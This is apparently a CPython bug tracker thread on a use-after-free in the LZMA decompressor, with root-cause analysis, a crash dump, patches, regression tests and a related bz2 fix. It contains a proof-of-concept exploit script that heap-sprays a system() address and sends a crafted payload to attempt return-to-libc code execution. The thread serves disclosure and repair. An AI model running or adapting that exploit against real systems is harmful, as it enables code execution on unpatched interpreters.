LZMADecompressor.decompress Use After Free #72462
Python 3.5.2 suffers from a use after free vulnerability caused by the behavior of the LZMADecompressor.decompress method. The problem exists due to a dangling pointer created by an incomplete error path in the _lzma!decompress function.

static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
    char input_buffer_in_use;
    PyObject *result;
    lzma_stream *lzs = &d->lzs;

    /* Prepend unconsumed input if necessary */
    if (lzs->next_in != NULL) {
        [...]
    }
    else {
        lzs->next_in = data;
        lzs->avail_in = len;
        input_buffer_in_use = 0;
    }

    result = decompress_buf(d, max_length);
    if (result == NULL)
        return NULL;
    [...]
}

When the function is first called, lzs->next_in is NULL, so it is set using the data argument. If the subsequent call to decompress_buf fails because the stream is malformed, the function returns while maintaining the current value for lzs->next_in. A couple of returns later, the allocation pointed to by lzs->next_in (data) is freed when the wrapper calls PyBuffer_Release:

static PyObject *
_lzma_LZMADecompressor_decompress(Decompressor *self, PyObject *args, PyObject *kwargs)
{
    PyObject *return_value = NULL;
    static char *_keywords[] = {"data", "max_length", NULL};
    Py_buffer data = {NULL, NULL};
    Py_ssize_t max_length = -1;

    if (!PyArg_ParseTupleAndKeywords(args, kwargs, "y*|n:decompress", _keywords,
        &data, &max_length))
        goto exit;
    return_value = _lzma_LZMADecompressor_decompress_impl(self, &data, max_length);

exit:
    /* Cleanup for data */
    if (data.obj)
        PyBuffer_Release(&data);

    return return_value;
}

At this point, any further call to decompress on the same Decompressor instance (a typical use case, since multiple calls may be necessary to decompress a single stream) will result in a memcpy to the dangling lzs->next_in pointer, and thus memory corruption.

static PyObject *
decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
{
    char input_buffer_in_use;
    PyObject *result;
    lzma_stream *lzs = &d->lzs;

    /* Prepend unconsumed input if necessary */
    if (lzs->next_in != NULL) {
        size_t avail_now, avail_total;
        [...]
        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
        lzs->avail_in += len;
        input_buffer_in_use = 1;
    }
    else {
        [...]
    }
}

This vulnerability can be exploited to achieve arbitrary code execution. In applications where untrusted LZMA streams are received over a network, it might be possible to exploit this vulnerability remotely. A simple proof of concept that demonstrates a return-to-libc attack is attached.

import _lzma
from array import *

# System address when tested: 76064070
d = _lzma.LZMADecompressor()
spray = [];
for x in range(0, 0x700):
    meg = bytearray(b'\x76\x70\x40\x06' * int(0x100000 / 4));
    spray.append(meg)

def foo():
    for x in range(0, 2):
        try:
            d.decompress(b"\x20\x26\x20\x63\x61\x6c\x63\x00\x41\x41\x41\x41\x41\x41\x41\x41" * int(0x100 / (4*4)))
        except:
            pass

foo()
print(len(spray[0]))
print(len(spray))

To fix the issue, it is recommended that lzs->next_in be zeroed in the event the call to decompress_buf fails. A proposed patch is attached.

result = decompress_buf(d, max_length);
if(result == NULL) {
    lzs->next_in = 0;
    return NULL;
}

A repro file is attached as well. Exception details:

0:000> r
0:000> !analyze -v -nodb

FAULTING_IP:
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
CONTEXT: 00000000 -- (.cxr 0x0;r)
FAULTING_THREAD: 000043fc
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: python_d.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 09275fe8
WRITE_ADDRESS: 09275fe8
FOLLOWUP_IP:
NTGLOBALFLAG: 2000000
APPLICATION_VERIFIER_FLAGS: 0
APP: python_d.exe
ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_WRITE
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ
LAST_CONTROL_TRANSFER: from 5d573f80 to 6bf55149
STACK_TEXT:
STACK_COMMAND: .cxr 0x0 ; kb
FAULTING_SOURCE_LINE: f:\dd\vctools\crt\vcruntime\src\string\i386\memcpy.asm
FAULTING_SOURCE_FILE: f:\dd\vctools\crt\vcruntime\src\string\i386\memcpy.asm
FAULTING_SOURCE_LINE_NUMBER: 658
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: vcruntime140d!TrailingDownVec+1f9
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: VCRUNTIME140D
IMAGE_NAME: VCRUNTIME140D.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 558ce3d5
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_VCRUNTIME140D.dll!TrailingDownVec
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ_vcruntime140d!TrailingDownVec+1f9
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_vcruntime140d.dll!trailingdownvec
FAILURE_ID_HASH: {935a9c66-b210-2678-8c10-c746a999bfb6}
Followup: MachineOwner
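
The lifetime problem described in this report can be modelled safely in pure Python. The sketch below is not the _lzma code: ToyDecompressor, StreamError, call_like_wrapper and second_call_outcome are hypothetical names, the "valid input starts with OK" rule is invented for illustration, and a released memoryview stands in for the freed buffer so that touching it raises ValueError instead of corrupting memory. It assumes only the control flow shown in the excerpts above.

```python
class StreamError(Exception):
    """Hypothetical stand-in for the error reported by decompress_buf."""


class ToyDecompressor:
    """Hypothetical model of the next_in bookkeeping, not the real _lzma code."""

    def __init__(self, clear_on_error):
        self.clear_on_error = clear_on_error
        self.next_in = None  # plays the role of lzs->next_in

    def _decompress_buf(self):
        # Toy rule (an assumption): only input starting with b"OK" is valid.
        data = self.next_in.tobytes()
        if not data.startswith(b"OK"):
            raise StreamError("malformed stream")
        self.next_in = None  # all input consumed
        return data[2:]

    def decompress(self, view):
        if self.next_in is not None:
            # Models the memcpy onto the retained buffer. If that buffer was
            # released by the caller, tobytes() raises ValueError.
            pending = self.next_in.tobytes() + view.tobytes()
            self.next_in = memoryview(pending)
        else:
            self.next_in = view
        try:
            return self._decompress_buf()
        except StreamError:
            if self.clear_on_error:
                self.next_in = None  # models the proposed fix
            raise


def call_like_wrapper(dec, payload):
    """Acquire a buffer, call decompress, and always release the buffer."""
    view = memoryview(payload)
    try:
        return dec.decompress(view)
    finally:
        view.release()  # models PyBuffer_Release(&data)


def second_call_outcome(clear_on_error):
    dec = ToyDecompressor(clear_on_error)
    try:
        call_like_wrapper(dec, b"garbage")
    except StreamError:
        pass
    try:
        call_like_wrapper(dec, b"garbage")
    except StreamError:
        return "clean error"
    except ValueError:
        return "stale buffer touched"
    return "no error"


print(second_call_outcome(clear_on_error=False))
print(second_call_outcome(clear_on_error=True))
```

Without the reset, the second call reaches the retained (released) buffer; with the reset, it fails cleanly on the new input, which is the behavior the proposed patch aims for.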
Thanks John. Could you please add a test based on your reproducer?
Of course. Attached is a new patch that includes test coverage. It crashes on failure as there isn't any reasonable way to monitor for this kind of undefined behavior, but it's better than nothing.
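
A regression check along these lines might look like the sketch below. It is an illustration under stated assumptions rather than the attached patch: the helper name errors_on_reuse and the corrupted input are made up here, and it should only be run on an interpreter that already contains the fix, since on an affected build the second call is exactly what triggers the undefined behavior.

```python
import lzma


def errors_on_reuse(bad_stream, attempts=2):
    """Feed the same malformed input to one decompressor several times.

    Returns the exception class name raised by each call, or None for a
    call that did not raise. Hypothetical helper, not part of the lzma API.
    """
    dec = lzma.LZMADecompressor()
    outcomes = []
    for _ in range(attempts):
        try:
            dec.decompress(bad_stream)
            outcomes.append(None)
        except lzma.LZMAError as exc:
            outcomes.append(type(exc).__name__)
    return outcomes


# Build a malformed stream: flip the first stream-flags byte of a valid
# .xz header so that the header no longer matches its stored CRC32.
corrupt = bytearray(lzma.compress(b"example payload"))
corrupt[6] ^= 0xFF

print(errors_on_reuse(bytes(corrupt)))
```

On a fixed build, both calls are expected to fail with an ordinary exception. As noted in the comment above, a failing run on an affected build would show up as a crash rather than a test failure.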
New changeset b4c0e733b342 by Serhiy Storchaka in branch '3.5':
New changeset 52f8eb2fa6a6 by Serhiy Storchaka in branch '3.6':
New changeset 6117d0e1a5c9 by Serhiy Storchaka in branch 'default':
Committed with small changes. Thank you John for your contribution. Tested that 3.4 is not affected.
Here is a patch to fix the corresponding bug in the bzip decompressor. I will try to commit it soon if there are no objections. For the record, these bugs were introduced with the max_length support in bpo-15955. The bzip code was modelled after the LZMA code.
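
The same kind of reuse-after-failure check can be sketched for the bz2 module. This is a hedged illustration, not the patch mentioned above: bz2_errors_on_reuse is a hypothetical helper, the input is simply arbitrary non-bzip2 text, and it is meant for interpreters that already include the fix.

```python
import bz2


def bz2_errors_on_reuse(bad_data, attempts=2):
    """Call decompress repeatedly on one BZ2Decompressor with invalid input.

    Returns the exception class name for each call, or None if a call
    did not raise. Hypothetical helper for illustration only.
    """
    dec = bz2.BZ2Decompressor()
    outcomes = []
    for _ in range(attempts):
        try:
            dec.decompress(bad_data)
            outcomes.append(None)
        except Exception as exc:  # the exact exception type is not assumed
            outcomes.append(type(exc).__name__)
    return outcomes


not_bzip2 = b"this is not a valid bzip2 stream" * 30
print(bz2_errors_on_reuse(not_bzip2))
```

The check deliberately accepts any exception type: the point is only that a second call on the same decompressor fails cleanly instead of touching a released input buffer.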
LGTM. It may also be worth rewriting the lzma test in your style.
New changeset 36d37ff6c236 by Martin Panter in branch '3.5':
New changeset dca18f0ec280 by Martin Panter in branch '3.6':
New changeset 35b5f4cc08f4 by Martin Panter in branch 'default':